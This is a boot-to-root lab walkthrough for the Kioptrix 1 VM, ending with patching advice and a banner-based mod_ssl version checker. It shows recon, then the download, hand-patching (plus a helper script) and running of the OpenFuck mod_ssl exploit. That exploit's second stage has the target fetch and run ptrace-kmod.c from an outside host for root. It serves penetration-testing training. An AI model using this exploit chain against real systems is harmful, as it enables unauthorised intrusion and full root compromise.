Rooting Kioptrix 1 Walkthrough

Overview

Kioptrix 1 is a boot-to-root (B2R) virtual machine designed for students to practise vulnerability analysis and exploitation. The objective is to obtain root on the machine by exploiting the vulnerabilities it exposes, ending in full system compromise.

Vulnerabilities Exploited:

  • Apache mod_ssl < 2.8.7 OpenSSL Remote Buffer Overflow (Exploit-DB 764, "OpenFuck")

Lab Setup:

  • VMware Workstation for the virtual machines
  • Kali Linux VM in bridged mode
  • Kioptrix 1 in bridged mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap
  • gcc

Reconnaissance/Scanning

# netdiscover

netdiscover sends ARP requests across the bridged LAN and lists every host that answers; the VMware-assigned MAC address identifies the Kioptrix VM.

Target VM IP address: 192.168.8.106

nmap

Let's scan the target with nmap to find open ports and identify the services behind them.

# nmap -p- -A --webxml -oX nmap-kioptrix1.xml 192.168.8.106

-p- scans all 65535 TCP ports, -A adds version and OS detection, and -oX with --webxml writes the results as XML that can be viewed in a browser.

Exploitation

The scan reports Apache 1.3.20, which is badly out of date, so let's search for an exploit (Exploit-DB, or searchsploit, which indexes the same /usr/share/exploitdb tree used in the compile step below). Exploit-DB 764 (OpenFuck) targets an overflow in the SSLv2 handshake code of the OpenSSL library that this mod_ssl build links against; a successful run returns a shell as the web-server user, and the exploit's built-in second stage then downloads and compiles a local kernel exploit on the target to become root.

It looks straightforward, so download the exploit to the Kali machine:

wget -O openFuck2.c https://www.exploit-db.com/download/764/

and customise it according to the instructions at the top of the exploit and the notes at http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/

These are the customisation steps.

1) Add these two headers near the top of the file:

#include <openssl/rc4.h>

#include <openssl/md5.h>

2) Update the URL of the C file: search for wget and replace the URL with this new one: http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

This URL is fetched by the target, not by Kali: after the overflow lands a shell as the web-server user, the exploit's second stage runs wget on the target to download ptrace-kmod.c (a local kernel privilege escalation), compiles it and runs it to get root. The Kioptrix VM therefore needs to reach that host, which the bridged setup provides. If it cannot (or the host now redirects to HTTPS, which the VM's old wget cannot follow), serve the file from a web server on the Kali box and point this URL there instead.

3) Install the OpenSSL development headers:

apt-get install libssl-dev

Note that the exploit was written against the old OpenSSL 0.9.x API. On current Kali releases, where libssl-dev is OpenSSL 1.1 or newer, the build fails against the opaque structures of the new API; build it against an OpenSSL 1.0.x development package, or inside an older container or VM.

4) Update the variable declaration

Around line 961 (search for the declaration), change:

unsigned char *p, *end;

By adding const :

const unsigned char *p, *end;

5) Compile the patched file and you're done

To compile:

gcc -o openFuck2 openFuck2.c -lcrypto

(The original post compiled the searchsploit copy at /usr/share/exploitdb/exploits/unix/remote/764.c; whichever copy you actually edited is the one to pass to gcc.)

Then run the exploit. Running the binary with no arguments prints its usage and the numbered target list; pick the entry matching the distribution and Apache build reported by nmap -A (Kioptrix 1 is Red Hat 7.2 with apache-1.3.20-16, listed as 0x6a and 0x6b) and pass it with the target address, port 443 and a connection count:

./openFuck2 0x6b 192.168.8.106 443 -c 40

If the first offset fails, try the other one or raise -c. The shell you land in first runs as the web-server user; the ptrace-kmod.c second stage is what promotes it to root, and it only works if the target can reach the URL set in step 2.

We are root! Verify with id before moving on. Congratulations!
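The five customisation steps above are easy to get wrong by hand, so here is an added example (not code from the walkthrough or from Exploit-DB) that applies steps 1, 2 and 4 to a local copy of the exploit source with portable printf/sed and then checks that all the edits landed. The function names, the argument layout (source path, output path) and the separate build function are my own; step 3 (the dev package) and step 5 (gcc) still need a working OpenSSL toolchain, so the build is kept in its own function.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough or of Exploit-DB 764.
# Applies the customisation steps to a copy of the exploit source and verifies them.
# Assumed names: patch_openfuck, check_patched and build_openfuck are mine.

NEW_URL='http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c'

# patch_openfuck SRC OUT: write a patched copy of SRC to OUT (SRC is left untouched).
patch_openfuck() {
    src="$1"; out="$2"
    # Step 1: prepend the two OpenSSL headers the modern build needs.
    { printf '#include <openssl/rc4.h>\n#include <openssl/md5.h>\n'; cat "$src"; } > "$out"
    # Step 2: repoint the wget of ptrace-kmod.c (inside the command string the
    #         exploit sends to the target) at the new host.
    # Step 4: add const to the "unsigned char *p, *end;" declaration.
    sed -e 's#http://[^ ;]*ptrace-kmod\.c#'"$NEW_URL"'#' \
        -e 's/^\([[:space:]]*\)unsigned char \*p, \*end;/\1const unsigned char *p, *end;/' \
        "$out" > "$out.tmp" && mv "$out.tmp" "$out"
}

# check_patched FILE: return 0 if every edit is present, 1 if any is missing.
check_patched() {
    f="$1"
    grep -q '^#include <openssl/rc4.h>' "$f" || return 1
    grep -q '^#include <openssl/md5.h>' "$f" || return 1
    grep -qF "$NEW_URL" "$f" || return 1
    grep -q 'const unsigned char \*p, \*end;' "$f" || return 1
    return 0
}

# build_openfuck FILE: step 5. Needs the OpenSSL development package (step 3);
# see the caveat in the text about OpenSSL 1.1+ on current Kali.
build_openfuck() {
    gcc -o openFuck2 "$1" -lcrypto
}

# Usage (after wget -O openFuck2.c https://www.exploit-db.com/download/764/):
#   patch_openfuck openFuck2.c openFuck2-patched.c
#   check_patched openFuck2-patched.c && build_openfuck openFuck2-patched.c
```

Because the patch is written to a separate file, a failed or partial edit can be diffed against the pristine download, and check_patched refuses a file that still points at the old packetstorm host.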

Countermeasure

Update Apache, mod_ssl and the OpenSSL it links against to current, patched versions (the overflow lives in OpenSSL's SSLv2 handshake code, so disabling SSLv2 in the mod_ssl configuration also removes the attack path). The root step relied on an old kernel ptrace bug, so the kernel needs patching too; otherwise any foothold as the web-server user still becomes root.
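To check whether a host is still in the affected range without running the exploit, the Server banner is enough, since this Apache build advertises its mod_ssl version. The following is an added example, not from the walkthrough: it extracts mod_ssl/X.Y.Z from a banner and compares it against the 2.8.7 threshold with a general dotted-version comparison (so it also handles versions such as 2.8.31 that a string compare would get wrong). The function names are mine, and the sample banners in the comments are constructed for illustration, not captured from the Kioptrix VM.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough. Assumed names: vercmp,
# modssl_version, modssl_vulnerable, assess_banner and assess_host are mine.

# vercmp A B: print -1, 0 or 1 as dotted version A is <, = or > B.
# Missing components count as 0, so "2.8" sorts before "2.8.7".
vercmp() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ai=${a%%.*}; bi=${b%%.*}
        [ -n "$ai" ] || ai=0
        [ -n "$bi" ] || bi=0
        if [ "$ai" -lt "$bi" ]; then printf '%s\n' '-1'; return; fi
        if [ "$ai" -gt "$bi" ]; then printf '%s\n' '1'; return; fi
        case $a in *.*) a=${a#*.} ;; *) a='' ;; esac
        case $b in *.*) b=${b#*.} ;; *) b='' ;; esac
    done
    printf '%s\n' '0'
}

# modssl_version BANNER: print the version after "mod_ssl/", or nothing if absent.
modssl_version() {
    printf '%s\n' "$1" | sed -n 's/.*mod_ssl\/\([0-9][0-9.]*\).*/\1/p'
}

# modssl_vulnerable BANNER: exit 0 when the banner advertises mod_ssl older than
# 2.8.7, 1 otherwise. A banner without a mod_ssl version is reported as not
# affected here; treat that as "unknown", not "safe", in a real assessment.
modssl_vulnerable() {
    v=$(modssl_version "$1")
    [ -n "$v" ] || return 1
    [ "$(vercmp "$v" 2.8.7)" = '-1' ]
}

# assess_banner BANNER: one-line verdict suitable for a scan report.
# Constructed sample: "Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b"
assess_banner() {
    v=$(modssl_version "$1")
    if [ -z "$v" ]; then
        printf 'no mod_ssl version advertised: %s\n' "$1"
    elif modssl_vulnerable "$1"; then
        printf 'VULNERABLE mod_ssl/%s (< 2.8.7): %s\n' "$v" "$1"
    else
        printf 'patched mod_ssl/%s: %s\n' "$v" "$1"
    fi
}

# assess_host HOST: fetch the banner over HTTPS (-k: the lab certificate is
# self-signed) and assess it. Not called here; needs network access.
assess_host() {
    banner=$(curl -skI "https://$1/" | sed -n 's/^[Ss]erver: *//p' | tr -d '\r')
    assess_banner "$banner"
}
```

Run assess_host 192.168.8.106 against the lab box; after the countermeasure is applied the verdict should change from VULNERABLE to patched, or to "no mod_ssl version advertised" if ServerTokens has been tightened as well.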
